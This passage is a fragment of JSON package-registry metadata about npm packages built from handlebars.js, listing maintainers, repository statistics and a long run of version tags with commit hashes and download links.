comments_per_pull_request":1.40625,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":15,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fhandlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fhandlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fhandlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fhandlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fhandlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fhandlebars/codemeta","maintainers":[{"uuid":"chiefmikey","login":"chiefmikey","name":null,"email":"wolfemikl@gmail.com","url":null,"packages_count":2073,"html_url":"https://www.npmjs.com/~chiefmikey","role":null,"created_at":"2026-03-09T05:20:15.971Z","updated_at":"2026-03-09T05:20:15.971Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chiefmikey/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8842948,"name":"@handlebarsjs/handlebars","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":"handlebarsjs","versions_count":4,"first_release_published_at":"2024-01-31T06:34:29.348Z","latest_release_published_at":"2024-01-31T06:14:15.447Z","latest_release_number":"5.0.0-alpha1","last_synced_at":"2026-07-19T22:22:29.290Z","created_at":"2024-01-31T06:15:18.967Z","updated_at":"2026-07-19T22:22:29.290Z","registry_url":"https://www.npmjs.com/package/@handlebarsjs/handlebars","install_command":"npm install @handlebarsjs/handlebars","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.7.8-2"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2023-12-13T23:07:16.000Z","size":4058,"stargazers_count":17759,"open_issues_count":91,"forks_count":2037,"subscribers_count":451,"default_branch":"master","last_synced_at":"2024-05-19T22:12:01.840Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2024-06-18T10:42:39.788Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1697,"total_committers":199,"mean_commits":8.527638190954773,"dds":0.5132586918090749,"last_synced_commit":"e6686963ba1140ad6d8d10f7f302d1adf6b8740f"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":214553557,"owners_count":15750166,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencie